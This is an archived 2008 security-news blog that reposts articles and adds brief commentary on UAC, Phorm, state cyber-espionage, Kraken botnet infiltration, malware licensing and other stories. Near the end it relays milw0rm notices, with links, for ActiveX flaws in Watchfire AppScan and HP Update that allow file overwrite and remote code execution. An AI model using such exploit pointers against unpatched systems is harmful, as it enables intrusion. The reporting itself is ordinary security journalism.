Wednesday, April 30, 2008

NeoSmart Puts Foot in Mouth Over Vista UAC

Via ZDNet -

Software developers from NeoSmart, a not-for-profit technology-development organisation, claim they have successfully bypassed User Account Control, a security feature in Windows Vista.

The developers suggested on their website on Sunday that the feature was "only there to give the impression of security". Critics, however, have said that, by coding around User Account Control (UAC), the developers had simply done what Microsoft had intended them to do.

UAC is a controversial feature of Vista designed to stop users from installing or executing arbitrary code. Many see it as a hindrance to performing everyday tasks, as it requests confirmation for many actions where no user confirmation was needed in Vista's predecessor, XP. UAC does not request these confirmations from users with administrator privileges, but, in Vista, users do not by default have this status.

The NeoSmart developers are behind a tool, iReboot, that helps users choose which operating system they would like to reboot into. UAC had stopped the application from running at start-up, but the developers now claim to have bypassed UAC by splitting iReboot into two. One of the parts, running in the background, has privileged access to the operating system without requiring administrator approval each time the machine boots; the other part, running as a client program, interacts with this back-end service.

As the developers were able to grant the back-end part of the program privileges to run without express user approval every time the machine starts up, they claimed that Windows Vista's security limitations were "artificial at best, easy to code around, and only there to give the impression of security".

"Any program that UAC blocks from starting up 'for good security reasons' can be coded to work around these limitations with (relative) ease," wrote the developers in a blog post. "The 'architectural redesign' of Vista's security framework isn't so much a rebuilt system as much as it is a makeover, intended to give the false impression of a more secure operating system."

However, some individuals posting comments in reply to the blog post disagreed that UAC is an "artificial" security feature. "I feel your pain for having to split a simple program into two, but your ranting is way off the mark," wrote "steveg".

"You haven't coded around [UAC blocks]. Your users have granted your application administrator privileges during installation. Game over. All your base belong to us. Once you've acquired administrator rights, the machine is yours and UAC's role is done. If you had bypassed UAC without the user explicitly granting administrator rights, your rant would be completely justified; as it is, it's merely misinformed and wrong," steveg wrote.

Another poster, "Harry Johnston", said UAC had been expressly designed to force independent software developers to write code which would work in this way. "This is a perfect example of what UAC was actually invented for — to force developers to write software that works for people who aren't logged in as an administrator. Good thing too," he wrote.

These comments echoed earlier statements by Microsoft product unit manager David Cross, who said in a speech at the RSA Conference in San Francisco earlier this month that UAC was deliberately designed to "annoy users", in order to put pressure on third-party software makers to make their applications more secure.

Microsoft had not responded to a request for comment at the time of writing.

--------------------------------

Awesome. NeoSmart had to rewrite their application to work for non-admin users, which is exactly what Microsoft wanted third-party software vendors to do.....

Saying that you bypassed UAC, after being given administrator rights by the user behind the computer...is a pretty silly claim. Microsoft has stated in the past that UAC is not a hard security barrier - therefore it should be expected that applications that are purposely installed by the users could work with it.

BT to Implement Better Phorm Opt-Out

Via ThinkBroadband.com -

BT are to develop an alternate method to record your opt-out status to Phorm as opposed to the default cookie based system that relies on your computer storing a cookie to indicate you are not a Phorm user. This follows TalkTalk's decision along the same path back in March and is good news for consumers as it will ensure the opt-in or opt-out status of your account is held more reliably, and can also work across multiple computers on the same Internet connection.

Earlier this month the Information Commissioner Office (ICO) announced that ISPs using the Phorm system had to make it opt-in to comply with European law. This is definitely a step forward for the consumer, but ISPs TalkTalk and BT Retail had already pre-empted this to help ensure consumer confidence in the system.

There are, however, still concerns with regard to the legality of the opt-in where computers are used by multiple people. Nicholas Bohm of the Foundation for Information Policy Research (FIPR) has indicated in his legal analysis of Phorm (PDF) that the EU law as referenced above by the ICO actually requires consent from the "data subject", which could be any user of the computer / connection, not just the person who ordered or pays the bills (paragraphs 55-58). In a letter to LINX he goes on to explain that ISPs will need to get consent from all users, stating that one possible way to do this is to have the subscriber to the service promise that they are authorized to act on behalf of all users. This could well be a flawed approach as it is unlikely to be the case, particularly for unknown future users of the computer. With no easy way to actually identify the person using the computer, time will have to tell what approach is taken towards this by ISPs.

German Intel Agency (BND) Blasted for Cyber Espionage

Via SecurityFocus -

Eight months after the nation's chancellor accused China of information attacks, Germany now faces criticism over its intelligence agency's use of software designed to spy on other countries' officials.

The latest incident, which began in June 2006, involved Germany's intelligence agency -- the Bundesnachrichtendienst (BND) -- launching an information attack against the Ministry of Commerce and Industry of Afghanistan, ostensibly an ally, according to media reports. Using a Trojan horse, the intelligence agents were able to read an Afghan government official's e-mail, including his correspondence with a reporter working for the German news magazine Der Spiegel, and data stored on the compromised PC's hard drive. The German Constitution protects the secrecy of telecommunications, but BND's legal counsel concluded that, because the messages were stored communications, they did not fall under the constitutional protection, Der Spiegel reported.

The operation ended in November 2006, when a whistleblower sent a letter to his superiors warning of the surveillance, the magazine reported. In February 2008, an anonymous BND employee notified two members of Germany's parliament of the intelligence agency's wiretapping activities. The incident only recently came to light during a Parliament hearing two weeks ago.

Germany's Interior Minister Wolfgang Schaeuble raised the specter of terrorism during a TV interview to defend the cyber-espionage tactics as necessary. "It's about a few isolated cases," he said, according to an Associated Press report.

The revelations that German intelligence stole information from another country using malicious code are the latest incident of national spying. In November, Germany accused Chinese intelligence officials of spying on its government computer systems. In the United States, the government agency responsible for spying on other countries -- and defending American communications against eavesdropping -- remains accused of wiretapping communications between U.S. citizens and foreign terrorism suspects. And this week, four private investigators in Israel were sentenced to prison for their role in using Trojan horse programs to spy on clients' rivals.

In a previous controversial incident in Germany, BND agents used a Trojan horse to compromise computers of the Democratic Republic of the Congo, aiming to gather information to help German peacekeepers stationed in the troubled nation.

Der Spiegel is considering filing a lawsuit against the intelligence agency, the magazine stated in its coverage of the incident.

Robots to Swarm English Village in UK MoD Contest

Via CNET.com -

A village in England will host a robot hide-and-seek exercise next month, when 11 teams drawn from private companies and universities compete to sniff out snipers, roadside bombs, and other hidden dangers while relaying real-time images to a command post.

The MOD Grand Challenge, as it's called, is billed as the U.K. Ministry of Defense's counterpart to the U.S. DARPA Challenges, except it's military robots that compete against one another instead of robotic cars.

The purpose is to boost development of small robot teams capable of scouting out and alerting troops to potentially dangerous surprises on the urban battlefield. The robots must autonomously negotiate complex, unfamiliar terrain and urban clutter to locate the threats. Points are earned based on the number of threats uncovered in one hour. Points are lost if a team resorts to remote control to maneuver its bots at any stage.

One team, Stellar Consortium, will employ two unmanned aerial vehicles equipped with thermal, visual, and radar sensors to provide surveillance of the village. The data will then be used to direct a small robot on the ground.

The Swarm Systems team will field eight battery-powered, GPS-guided, Frisbee-sized, propeller-driven micro air vehicles (MAVs) called "Owls." These airborne bots hover and dart like birds while communicating with one another and a base station using Wi-Fi.

The highest-scoring team gets a shot at a lucrative MOD contract and a chance to see its system put to work in Afghanistan or southern Iraq.

Secret Sanya - China's New Nuclear Naval Base Revealed

Via Jane's Information Group -

China is constructing a major underground nuclear submarine base near Sanya, on Hainan Island off its southern coast, Jane's can confirm. Although Asian military sources have disclosed this fact to Jane's since 2002, high-resolution commercially available satellite imagery from DigitalGlobe allows independent verification of the previous suggestions.

The extent of construction indicates the Sanya base (also known as Yulin) could become a key future base for People's Liberation Army Navy (PLAN) aircraft carriers and other power-projection ships. In December 2007, perhaps in concert with a major PLAN exercise the previous month, the PLA moved its first Type 094 second-generation nuclear ballistic missile submarine (SSBN) to Sanya.

An underground submarine base and the positioning of China's most advanced sub-surface combatants at Sanya would have implications for China's control of the South China Sea and the strategically vital straits in the area. Further satellite imagery suggests the construction of Sanya has been supported by a gradual military build-up in the Paracel Islands over the last 20 years, and the transformation of the Chinese-occupied features in the Spratly Island group into assets that could support a range of military operations.

China's nuclear and naval build-up at Sanya underlines Beijing's desire to assert tighter control over this region. China's increasing dependence on imported petroleum and mineral resources has contributed to an intensified Chinese concern about defending its access to vital sea lanes, particularly to its south. It is this concern that in large part is driving China's development of power-projection naval forces such as aircraft carriers and long-range nuclear submarines.

China has pursued this build-up at Sanya with little fanfare, offering no public explanations regarding its plan to base nuclear weapons or advanced naval platforms there.

For both regional and extra-regional powers, it will be difficult to ignore that China is now building a major naval base at Sanya and may be preparing to house and protect a large proportion of its nuclear forces here, and even operate them from this base. This development so close to the Southeast Asian sea lanes so vital to the economies of Asia can only cause concern far beyond these straits.

Tuesday, April 29, 2008

IBM Quietly Takes a Stake in Spansion's Racetrack Memory

Via BetaNews.com -

After quietly taking an equity stake in two-year-old startup flash memory manufacturer Spansion, IBM now plans to augment its own still emerging, futuristic "racetrack" memory with flash memory dubbed MirrorBit.

IBM envisions its highly non-volatile, endlessly rewritable racetrack memory (RM) technology as capable of storing 3,500 movies on a single handheld MP3 player within the next decade. Now, under a cross-licensing deal officially announced today, IBM will work with the world's #1 producer of NOR flash memory, Spansion, to produce RM.

Together, the two will co-develop RM, a magnetic medium with no moving parts, and MirrorBit, a "charge trapping" technology designed to increase the density of a flash memory array while keeping costs down on manufacturing.

As a particular target, the two companies are homing in on China, where Spansion employs more than 1,300 people at design centers in Beijing and Suzhou, a manufacturing plant in Suzhou, and three sales and marketing offices.

Already in use by the top ten automotive OEMs, MirrorBit is also utilized in embedded systems ranging from gaming machines and wireless devices to telecom networking equipment.

Declassified NSA Document Reveals the Secret History of TEMPEST

Via Wired.com -

It was 1943, and an engineer with Bell Telephone was working on one of the U.S. government's most sensitive and important pieces of wartime machinery, a Bell Telephone model 131-B2. It was a top secret encrypted teletype terminal used by the Army and Navy to transmit wartime communications that could defy German and Japanese cryptanalysis.

Then he noticed something odd.

Far across the lab, a freestanding oscilloscope had developed a habit of spiking every time the teletype encrypted a letter. Upon closer inspection, the spikes could actually be translated into the plain message the machine was processing. Though he likely didn't know it at the time, the engineer had just discovered that all information processing machines send their secrets into the electromagnetic ether.

Call it a TEMPEST in a teletype.

This story of how the United States first learned about the fundamental security vulnerability called "compromising emanations" is revealed for the first time in a newly-declassified 1972 paper TEMPEST: A Signal Problem (.pdf), from the National Security Agency's secret in-house journal Cryptologic Spectrum.

"There has always been speculation about TEMPEST coming out of the Cold War period," says Joel McNamara, author of Secrets of Computer Espionage: Tactics and Countermeasures, who maintained for years the best compilation of public information on TEMPEST. "But the 1943 Bell Labs discovery is roughly ten years earlier than I would have expected."

The unnamed Bell Telephone technician was the Alexander Graham Bell of a new, secret science, in which electronic eavesdroppers -- as far away as hundreds of feet from their target -- tune into radio waves leaking from electronic equipment to steal secrets.

Building on the breakthrough, the U.S. developed and refined the science in an attempt to spy on the Soviets during the Cold War. And it issued strict standards for shielding sensitive buildings and equipment. Those rules are now known to government agencies and defense contractors as TEMPEST, and they apply to everything from computer monitors to encrypted cell phones that handle classified information.

Until now, little has been known about when and how the U.S. government began trying to protect itself from this threat, and the NSA paper tells the story well.

Humor: CIA Coffee Mug

As a recovering coffee snob, I have quite a collection of coffee cups. Recently a friend was cleaning out their closet and found a Central Intelligence Agency Coffee Mug.

Of course, this friend knew of my background in the coffee industry and was nice enough to offer it to me, so I added it to my coffee cup collection. Well, it is less of a collection and more like a spot in my kitchen cabinet which contains a large number of coffee cups...but I digress.

According to my friend, it was acquired at the CIA gift shop in the late 90s (yea, they have/had a gift shop).

Anyways, here it is.

But guess what I found on the bottom??

Awesome. lol

Kraken Botnet Infiltration

Via DVLabs Blog -

Earlier this month a number of articles surfaced on the research and disagreements with regards to the size and classification of a large bot net named Kraken. At the front line of the debate was SecureWorks and Damballa. SecureWorks claims Kraken is actually Bobax and estimates the bot net to include over 185,000 compromised systems. Damballa disagrees, stating that Kraken is an entirely new bot net with a size over twice as large as Storm. Semantics aside, no one disagrees that Kraken/Bobax is among the largest of the known bot nets, if not the largest.

Cody and I thought it would be interesting to examine Kraken with the specific goal of infiltrating the bot network. We started with a sample from Offensive Computing and working from there eventually concluded that we would indeed be able to infiltrate and take over increasingly larger portions of the Kraken bot net. Cody did most of the manual labor of protocol dissection, reverse engineering the encryption routines and eventually creating a fake Kraken server capable of overtaking a redirected zombie. His detailed write up on the reverse engineering process is available under "Owning Kraken".

...

Various estimates place the overall size of the botnet to be somewhere between 185,000 and 600,000 zombies. This means that within a single week we would have been able to take over anywhere from 4% to 14% of the infected population ... and this is where we entered into a moral dilemma and ethical discussion. We have the ability to successfully redirect infected systems. We have the ability to provide an 'update' through the existing Kraken protocol that can simply remove the Kraken zombie (again see "Owning Kraken" for a video demonstrating this capability). Is it wrong to do so? Although this discussion is similar to that of writing "good worms" that roam the internet patching vulnerable servers, there is a key difference in that a good worm can't be stopped. Once it has been released it is a self-spreading, uncontrollable entity. In our specific case, however, we have the ability to cease at any point. It is simply a one-to-one relationship. An infected system connects to us, we supply a simple binary to kill the target process, we never hear from the infected system again and neither can the actual botnet owner's command and control servers.

Cody and I both are pro "cleansing". Dave Endler on the other hand is against. The arguments for pro-cleansing are obvious; the arguments against are a little more complicated. The most interesting of the points that Dave brought up is the corner case of what happens if we accidentally crash the target system? What if that target system is responsible for someone's life support? Yes, the system is already infected with a SPAM-delivering zombie capable of receiving arbitrary updates from malicious actors, but at least for now it's running and carrying out the rest of its functionality. As director of DVLabs, Dave's opinion overshadows that of our own so we simply sit and monitor. What are your personal thoughts on the matter?

--------------------------

The TippingPoint team brings up an interesting question.

Taking down the majority of the Kraken botnet with a rogue delete/shutdown command is a very "technically sweet" solution. However, it could have very serious consequences.

First, we don't know exactly what all of these computers are doing. As Dave pointed out, one could be controlling a life support system in a hospital. Another could be controlling some SCADA system. Another could be a server at a bank or another major corporation.

What if the command doesn't work perfectly on all the bots? What if the computer running the bot is already in an unstable condition due to massive infection? Will the computer crash or just reboot?

If the "cleansing" turns out to do physical damage in the real world, who will be responsible? TippingPoint? The people that issued the command? Or the owner of the infected computer? Who knows.

From the standpoint of TippingPoint, the idea of attempting to clean the bots sounds good but brings with it too much risk....risk that the corporation doesn't need.

It reminds me of the police pursuit question. Should police chase after a criminal if it will place innocent citizens in greater danger?

It's a grey area for sure, but I think most people would rather err on the side of caution...and not chase the everyday criminal if it will endanger the public.

Thieves Grab Backup Tapes Holding 2M Medical Records

Via ComputerWorld -

University of Miami officials last week acknowledged that six backup tapes from its medical school that contained more than 2 million medical records were stolen in March from a van that was transporting the data to an off-site facility.

Jacqueline Menendez, vice president of communications at the university, said a vehicle used by Archive America Ltd. to transport the patient data was broken into in downtown Coral Gables, Fla., on March 17. Thieves removed a transport case carrying the school's computer backup tapes, she said.

For reasons Menendez could not explain, Archive America waited 48 hours before finally notifying the university on Mar. 19 about the break-in and theft. Officials from the transport firm couldn't be reached.

The university posted an alert about the incident on April 17, a full month after the backup tapes were stolen. In a statement, Doctor Pascal J. Goldschmidt, senior vice president for medical affairs and dean of the University of Miami Miller School of Medicine, said, "Even though I am confident that our patients' data is safe, we felt that in the best interest of the physician-patient relationship we should be transparent in this matter."

Since the incident, Menendez said that the university temporarily stopped transporting backup data off-site. "At this point, we're not transporting anything until we conduct our own internal evaluation of the incident and see if there's anything that could have been done differently or better," she said.

Coral Gables law enforcement officials, who are investigating the incident, have informed the school that it was likely a "random theft," Menendez noted.

The stolen backup tapes hold names, addresses, Social Security numbers and health information of all patients at university medical facilities since Jan. 1, 1999. Financial data from approximately 47,000 people may be on the missing tapes, said Menendez. Each potential victim has been contacted by the school, she said.

Radio Free Europe Under Cyber Attack

Via myway.com -

PRAGUE, Czech Republic (AP) - Several Web sites of the U.S.-funded Radio Free Europe/Radio Liberty have been attacked, the broadcaster said Monday, suggesting the Belarus government could be responsible.

In the form of a denial-of-service attack that floods servers with fake traffic so legitimate visitors cannot get through, the assault began Saturday and continues, the network said in a statement.

The broadcaster said it is trying to restore its Web sites.

The attack is aimed mainly at the site of Radio Free Europe's Belarus service, but Web sites serving Iran, Russia, Azerbaijan, Tajikistan, Kosovo, Macedonia, Bosnia and Croatia also have been affected, the network said.

Jeffrey Gedmin, the network's president, compared the attack to communist countries jamming U.S.-backed broadcasts during the Cold War.

"Dictators are still trying to prevent the kind of unfiltered news and information that (Radio Free Europe) provides from reaching their people," Gedmin said. "They did not succeed in the last century and they will not succeed now."

Radio Free Europe/Radio Liberty is a private, nonprofit corporation that receives funding from the U.S. government. It was established in 1949 to spread pro-Western news and promote democratic values and institutions in countries behind the Iron Curtain.

The head of the radio's Belarus service, Alexander Lukashuk, said the attack began on the 22nd anniversary of the Chernobyl nuclear catastrophe in neighboring Ukraine. He said a similar attack took place the same day one year ago but lasted only hours and did not hit services in other languages.

"We have a large Internet audience (in Belarus) that was relying on us to report live a rally of thousands of people protesting the plight of uncompensated Chernobyl victims and a government decision to build a new nuclear power station," he said.

The broadcaster suggested the government of authoritarian Belarus President Alexander Lukashenko could be behind the attack.

"It's very hard to be certain in these cases but because the target was the Belarus service it does look like it's coming from the Belarus government," said Diane Zeleny, spokeswoman for the broadcaster.

"For our listeners in Belarus, it's quite dramatic," Zeleny said. "They cannot reach us right now. This is a pretty massive attack."

There was no immediate response from the Belarussian government.

Antivirus Vendors Pan Free Research From DefCon Contest

Via arstechnica.com -

A new contest focused on testing antivirus and malware software has been announced for the DefCon hacker conference in August. Antivirus vendors are crying foul, but they could very well be ignoring one of the best opportunities to improve their own products.

Called "The Race to Zero," this sideline contest provides hackers with samples of virus and malware code. The challenge is to modify the code in such a way that it can successfully circumvent antivirus products running at a central portal at the conference.

The Race to Zero web site explains that the goal is not to crowdsource new viruses, saying, "Not all antivirus is equal, some products are far easier to circumvent than others. Poorly performing antivirus vendors should be called out." The site also states that modified samples will not be released into the wild and that a key element of the contest's big picture is that "you need to look at controlling your endpoint devices with patching, firewalling and sound security policies to remain virus free."

Race to Zero will award the overall winning team or individual for successful code that passes through the AV products in each round. In addition, other awards will be given for things like "most elegant obfuscation," "dirtiest hack of an obfuscation," "comedy value," and "most deserving of beer." Details have not been released as to what each of these awards will be (though beer appears to be involved).

Obviously, virus and malware authors don't need a conference to collaborate on attacking AV products, but that isn't stopping the vendors from slamming Race to Zero. "[The contest] will do more harm than good," TrendMicro's Paul Ferguson told Network World. "Responsible disclosure is one thing, but now actually encouraging people to do this as a contest is a little over the top."

Roger Thompson, chief research officer at AVG Technologies, says vendors are already processing 30,000 code samples each day. "It's hard to see an upside for encouraging people to write more viruses."

On the other side of this coin, however, is a mountain of criticism against AV vendors that their products are falling behind in the use of emerging techniques and technologies. As malware organizations adopt Software as a Service business models, statements on the Race to Zero web site that "signature-based antivirus is dead" and "people need to look to heuristic, statistical and behaviour-based techniques to identify emerging threats" echo a growing dissatisfaction with the AV industry.

Instead of trying to deride Race to Zero, the AV industry could have a chance at working with the contest to harness what, in reality, could turn out to be some of the best research available on new malicious techniques. "You get what you pay for," as the old saying goes, but in the case of Race to Zero, the AV industry could be passing up a veritable gold mine of free ideas on how to better fight new threats.

------------------------------------------

Fergie is a long time friend and I hold him in great respect, but personally I feel that people need to be shown what AV really is....just another tool.

Tons of people still think that running AV is grand protection from everything, but this just isn't true. AV provides solid protection from known threats, but new emerging threats from a targeted attack are rarely stopped. The information is out there...for all to see.

Like it or not, showing people the truth is the essence of Defcon.

Do you think lock makers love the lockpick village? Of course not.

Should we not highlight the flaws in those silly RFID chips that the government wants to stick in everything? Of course we should.

Locks and RFID cards offer a layer of protection as well.

But in the end, they are just another tool.

Monday, April 28, 2008

Simple Brain Exercise Can Boost IQ

Via newscientist.com -

Can mental training improve your intelligence? No video game or mental puzzle has convincingly been shown to work. But now a group of neuropsychologists claims it has found a task that can add points to a person's IQ – and the harder you train, they say, the more you gain.

So-called "fluid intelligence", or Gf, is the ability to reason, solve new problems and think in the abstract. It correlates with professional and educational success and it appears to be largely genetic.

Past attempts to boost Gf have suggested that, although by training you can achieve great gains on the specific training task itself, those gains don't transfer to other tasks.

Now Susanne Jaeggi at the University of Michigan at Ann Arbor, US, and her colleagues say that is not true.

They invited 70 healthy adults to participate in a challenging training exercise known as the "dual n-back" task.

The first part of the exercise involves small squares on a screen that pop into a new location every three seconds. Volunteers have to press a button when the current location is a duplicate of two views earlier.

For the second part, the volunteers have to simultaneously carry out the same task with letters. Consonants are played through headphones and they have to press a button when they hear one that is the same as that heard two "plays" earlier.

If participants perform well, the interval to be tracked (n) increases to three or more stages earlier.

Jaeggi's volunteers were trained daily for about 20 minutes for either 8, 12, 17 or 19 days (with weekends off). They were given IQ tests both before and after the training.

The researchers found that the IQ of trained individuals increased significantly more than controls – and that the more training people got, the higher the score.

Glass Chip Spins Silk Just Like a Spider

Via newscientist.com -

It can't rival Spider-Man yet, but a new micromachine that works like a spider's silk duct might finally lead the way to producing industrial quantities of high-quality artificial spider silk.

Spider silk is super-light, super-strong and elastic too. Existing human materials lack its useful combination of properties, and proposed uses span everything from bulletproof vests to optic fibres.

Researchers have struggled for years to find an industrial process to make spider silk, and have tried everything from making it in a lab dish to creating silk-secreting goats.

Now German researchers have demonstrated a new method of production – an artificial version of the ducts spiders use to "spin" the silk.

Spiders' silk ducts contain glands that process a gel of simple proteins into long fibres of protein. Different glands alter the chemistry of the gel in different ways, producing silk with different properties.

The artificial duct is a glass chip shot through with tiny tubes that tries to mimic those processes.

"The best thing is to reproduce nature, instead of cutting open spiders," says Andreas Bausch of the Technical University of Munich in Germany, who led the research with Thomas Scheibel of the University of Bayreuth, also Germany.

Bausch and Scheibel are the first to create a device that so accurately recreates the chemical and physical conditions of a real silk duct.

They are also the first to make fibres containing more than one silk protein. The chip uses two – known as ADF3 and ADF4 – found in silk from the European garden spider (Araneus diadematus).

Spitzer Call Girl Sues 'Girls Gone Wild'

Via AP -

The call girl linked to the downfall of former New York Gov. Eliot Spitzer sued the founder of the "Girls Gone Wild" series on Monday for $10 million, claiming he exploited her image and name to advertise the racy videos.

Ashley Alexandra Dupre, 22, contended in the lawsuit that she was only 17 — too young to sign legally binding contracts — and drunk on spring break in 2003 when she agreed to be filmed for "Girls Gone Wild" in Miami Beach.

Dupre "did not understand the magnitude of her actions, nor that her image and likeness would be displayed in videos and DVDs," says the lawsuit filed by Miami attorney Richard C. Wolfe.

The lawsuit filed in federal court in Miami names as defendants "Girls Gone Wild" founder Joe Francis, two of his companies and a man purportedly involved in creation of two Internet sites that the lawsuit contends improperly use Dupre's image to sell DVDs and other products.

Francis, 35, has built a soft porn empire filming and marketing videos of young women exposing their breasts and being shown in other sexually provocative situations, often at public events such as Mardi Gras or spring break beach locales.

Dupre gained notoriety in March when it came out that she was the high-priced call girl named "Kristen" named in court documents who was hired by Spitzer for at least one tryst at a posh Washington hotel. Spitzer, known as "Client 9" in the documents, resigned as New York governor a few days after the scandal broke.

Francis made a public $1 million offer for Dupre to appear in a "Girls Gone Wild" video and go on a promotional tour, then rescinded the offer after he realized he already had footage of Dupre from 2003. Dupre's lawyer warned she was only 17 when the video was shot, not 18 as Francis claimed.

Francis said in March that Dupre spent a week on a "Girls Gone Wild" bus and made seven full-length tapes after signing release papers. He also said he bought her a bus ticket home to North Carolina.

Francis said he was surprised by the lawsuit.

"It is incomprehensible that Ms. Dupre could claim she did not give her consent to be filmed by Girls Gone Wild, when in fact we have videotape of her giving consent, while showing her identification," Francis said in a statement.

-------------------------

What a silly story...

Humor: Zealous Autoconfig


Airport Face Scans to Begin This Summer in UK

Via Guardian UK -

Airline passengers are to be screened with facial recognition technology rather than checks by passport officers, in an attempt to improve security and ease congestion, the Guardian can reveal.

From summer, unmanned clearance gates will be phased in to scan passengers' faces and match the image to the record on the computer chip in their biometric passports.

Border security officials believe the machines can do a better job than humans of screening passports and preventing identity fraud. The pilot project will be open to UK and EU citizens holding new biometric passports.

But there is concern that passengers will react badly to being rejected by an automated gate. To ensure no one on a police watch list is incorrectly let through, the technology will err on the side of caution and is likely to generate a small number of "false negatives" - innocent passengers rejected because the machines cannot match their appearance to the records.

They may be redirected into conventional passport queues, or officers may be authorised to override automatic gates following additional checks.

Ministers are eager to set up trials in time for the summer holiday rush, but have yet to decide how many airports will take part. If successful, the technology will be extended to all UK airports.

The automated clearance gates introduce the new technology to the UK mass market for the first time and may transform the public's experience of airports.

Existing biometric, fast-track travel schemes - iris and miSense - operate at several UK airports, but are aimed at business travellers who enroll in advance.

The rejection rate in trials of iris recognition, by means of the unique images of each traveller's eye, is 3% to 5%, although some were passengers who were not enrolled but jumped into the queue.

--------------------------

They should do this in the states....if it removes the need for me to take off my shoes.

Geez, that is a stupid rule.

VXers Slap Copyright Notices on Malware

Via The Register UK -

Malware authors have lifted a page from the legit software industry's rule book and are slapping copyright notices on their Trojans.

One Russian-based outfit has claimed violations of its "licensing agreement" by its underworld customers will result in samples of the knock-off code being sent to anti-virus firms.

The sanction was spotted in the help files of a malware package called Zeus, detected by security firm Symantec as "Infostealer Banker-C". Zeus is offered for sale on the digital underground, and its creators want to protect their revenue stream by making the creation of knock-offs less lucrative.

The copyright notice, a reflection of a lack of trust between virus creators and their customers, is designed to prevent the malware from being freely distributed after its initial purchase. Virus writers are essentially relying on security firms to help them get around the problem that miscreants who buy their code to steal online banking credentials have few scruples about ripping it off and selling it on.

In a blog posting, Symantec security researchers have posted screen shots illustrating the "licensing agreement" for Infostealer Banker-C.

The terms of this licensing agreement demand that clients promise not to distribute the code to others, and pay a fee for any update to the product that doesn't involve a bug fix. Reverse engineering of the malware code is also verboten.

"These are typical restrictions that could be applied to any software product, legitimate or not," writes Symantec researcher Liam O'Murchu, adding that the most noteworthy section deals with sanctions for producing knock-off code (translation below).

In cases of violations of the agreement and being detected, the client loses any technical support. Moreover, the binary code of your bot will be immediately sent to antivirus companies.

Despite the warning, copies of the malware were traded freely on the digital underground days after its release, Symantec reports. "It just goes to show you just can’t trust anyone in the underground these days," O'Murchu notes.

--------------------------

Wow. This means that malware authors are threatening to report their own creation to AV companies, if the client attempts to screw the malware author (they don't care if you steal bank records with it). It is like some type of written DRM for malware.

This should also show the world how confident malware authors are about evading AV detection. They are willing to send in their own program...just to screw their client - since they can easily modify it to evade detection again right afterwards.

Hackers Shut Down Bank of Israel

Via The Register UK -

Hackers have managed to shut down the Bank of Israel for two whole days, taking advantage of the Jewish festival of Passover, when senior staff members were out of the office.

According to Israeli newspaper Globes, who were first to alert the bank to the fact that they’d been attacked, hackers managed to scrawl "Hear me Jews, you're a nation whose fate is sealed and sooner or later you will lose in war."

The Bank of Israel was quick to close the site until it could get a handle on who exactly was behind the attack, and what damage they had done. The Bank also said that it was 'temporarily closed', but that might just be because its lazy and patently hopeless security staff wanted to stretch the long weekend out a bit further.

Globes reported that the text went on to say "Victory will come, inshallah (God willing) and the scenario of Chechnya will be repeated and we will drive you out. Millions of young Muslims are willing to die for al-Quds (Jerusalem), which belongs to us."

Globes was apparently told by its sources in the bank that financial reports going as far up as October 2007 had been deleted from the bank’s systems, but Bank of Israel spokesman, Yossi Saadon, said that the problem was 'being dealt with' and that the 'incident has no effect on the bank's internal systems'.

He added that all transactions were protected in such a way that there was no conceivable way that anyone could have hacked into the actual data systems from the Internet. He hopes.

Algeria is the top suspect but not the only one. Some Israelis think that Hizbullah is much more likely to be behind the attack, or Qatar, or even Palestinians from Gaza. But seeing as most of these groups tend to blow things up as a way of expressing themselves, the bank hack seems a tad too articulate.

The bank will be open for business again once the remaining questions about the embarrassing hack have been answered. Or just as soon as the bank’s employees can be bothered to drag themselves back to the office. Probably the latter.

Experts Crack New Kraken Variant

Via DarkReading.com -

Leading security software vendor PC Tools revealed that it has identified a new variant of the Kraken bot, also known as Bobax, and has disclosed the source code of its key component. The new variant employs new techniques to evade detection, which make this latest Kraken bot a significant threat.

“PC Tools are revealing the details of the latest Kraken variant including the new list of domain names as well as the mathematical algorithm used. The source code of the Kraken domain name generation algorithm is disclosed in the interests of congregating all the knowledge about this bot so that other security specialists can benefit from it,” said Sergei Shevchenko, Senior Malware Researcher, PC Tools. “The more collective knowledge security vendors have over this threat, the greater the chance the industry has of defeating it,” said Shevchenko.

PC Tools Pty Ltd.

Multiple Insecure Methods in AppScan Watchfire Web Application Security v 7.0

An arbitrary file overwrite has been discovered in an ActiveX control installed with the WatchFire Appscan v 7.0.

by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r

http://www.milw0rm.com/exploits/5496

Insecure Methods in HP Update Software

Executing code remotely is possible using the methods ExecuteAsync and Execute :-)
If a user visits the malicious page the attacker can execute code.
Coded by callAX

http://www.milw0rm.com/exploits/5511

------------------------

According to Secunia, HP has addressed the vulnerabilities in 4.000.010.008 (see HP advisory for details).

Friday, April 25, 2008

Anti-Spyware Coalition Probes Data Pimping

The Register UK -

The Anti-Spyware Coalition has launched a review of Phorm, NebuAd, and other behavioral targeting firms that track user data from inside the world's ISPs.

Today, the ASC - a collection of anti-spyware companies, academics, and various consumer advocates - announced a new internal working group to decide how Phorm and the Phormettes will affect the organization's overarching policies on spyware.

These policies serve as guidelines for the leading anti-spyware apps. "We update our documents when new potential threats and new potentially-unwanted technologies emerge," says Ari Schwartz, the vice president and chief operating officer at the Center for Democracy and Technology, which first organized the ASC. "Some [anti-spyware companies] have said that behavioral advertising is a gray area when it comes to the ASC definitions. And if some people think this is a gray area, it's something we need to look at."

Through partnerships with ISPs on both sides of the Atlantic, companies such as Phorm, NebuAd, and Front Porch track search and browsing activity in an effort to target online ads. Phorm and NebuAd serve up ads on their own, while Front Porch licenses its data to third-party ad networks.

In some cases, anti-spyware tools already flag the ad-server cookies laid down by the likes of Phorm and NebuAd - as well as cookies used by Front Porch partners. The big question is how the cookies should be flagged.

"We need to go into detail on how the consent factors work here. Does someone clearly know they're being tracked or not?" Schwartz says. "We must determine what level of risk is tied to these things."

All three of these behavioral ad firms insist the data they collect includes no personally identifiable information. But it's unclear whether users are properly notified before these services are turned on.

NebuAd says that ISP partners are required to "directly notify" users via letter or email, but this hasn't always happened in the past. In some cases, Front Porch notifies users with a conspicuous in-browser message. But in other cases, it does not.

Phorm hasn't officially rolled out its service, but it has agreements with BT, Carphone Warehouse, and Virgin in the UK (though Virgin insists this does not mean it will actually use the service). Carphone has said it will ask for user consent before turning Phorm on, but the others have not. In 2006 and 2007, Phorm conducted trials on BT's network without telling customers diddly.

Other operations that appear to be working on similar services include a Bay Area company called Adzilla; and Project Rialto, a "stealth company" created by Alcatel-Lucent, but these firms have not responded to our interview requests.

In Shift, China Offers to Meet With Dalai Lama Envoys

Via NYTimes -

